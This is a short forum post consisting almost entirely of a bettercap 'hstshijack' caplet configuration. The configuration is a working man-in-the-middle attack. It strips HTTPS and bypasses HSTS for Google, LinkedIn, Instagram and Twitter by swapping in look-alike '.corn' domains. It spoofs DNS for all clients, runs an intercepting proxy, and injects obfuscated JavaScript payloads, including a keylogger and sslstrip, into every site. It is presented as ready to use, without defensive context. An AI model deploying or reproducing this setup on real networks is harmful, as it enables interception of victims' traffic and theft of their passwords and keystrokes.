October 27, 2023 at 4:10 am #93774
lucmarrouche
Participant

# Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack

# Domains assigned to ‘hstshijack.targets’, ‘hstshijack.blockscripts’ and ‘hstshijack.payloads’
# variables get precendence over those assigned to the ‘hstshijack.ignore’ variable.
set hstshijack.targets google.com, *.google.com, gstatic.com, *.gstatic.com, linkedin.com, *.linkedin.com, instagram.com, *.instagram.com, twitter.com, *.twitter.com
set hstshijack.replacements google.corn, *.google.corn, gstatic.corn, *.gstatic.corn, linkedin.corn, *.linkedin.corn, instagram.corn, *.instagram.corn, twitter.corn, *.twitter.corn
set hstshijack.ssl.domains /usr/share/bettercap/caplets/hstshijack/domains.txt
set hstshijack.ssl.index /usr/share/bettercap/caplets/hstshijack/index.json
set hstshijack.ssl.check true
#set hstshijack.blockscripts example.com,*.example.com
set hstshijack.obfuscate true
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js,google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js
set hstshijack.ignore captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com

set http.proxy.script /usr//share/bettercap/caplets/hstshijack/hstshijack.js
http.proxy on

set dns.spoof.domains google.corn, *.google.corn, gstatic.corn, *.gstatic.corn, linkedin.corn, *.linkedin.corn, instagram.corn, *.instagram.corn, twitter.corn, *.twitter.corn
set dns.spoof.all true
dns.spoof on